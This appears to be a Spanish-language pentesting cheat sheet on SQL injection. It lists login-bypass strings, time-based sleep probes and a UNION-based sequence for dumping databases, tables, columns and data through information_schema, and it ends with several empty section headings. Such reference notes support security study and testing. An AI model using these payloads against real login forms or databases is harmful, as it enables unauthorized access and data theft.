💾SQLi

SQLi PoC - Login Form

admin' --
admin' #
admin' /*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

SQLi test:

'or 1=1-- -
'or sleep(5)-- -
'and sleep(5)-- -

Dump Manual:

# Comprobar número DBs
' union select 1,2,3-- - # Inyectamos en el número/s que se muestre.

# Enumera DB
' union select group_concat (schema_name)2,3 from information_schema.schemata-- -

# Enumera Tablas
' union select group_concat (table_name)2,3 from information_schema.tables where table_schema="<db-name>"-- -

# Enumera Columnas
' union select group_concat (column_name)2,3 from information_schema.columns where table_schema="<db-name>" and table_name="<table-name>"-- -

# Enumera Data
' union select group_concat (<column-name>)2,3 from <table-name>

SQLMap

MySQL dump - METASPLOIT

Lectura de SQLite DB:

Manual Blind SQLi

Authentication Bypass:

Boolean BasedzZZzzZZzzz...

Time Based:

Última actualización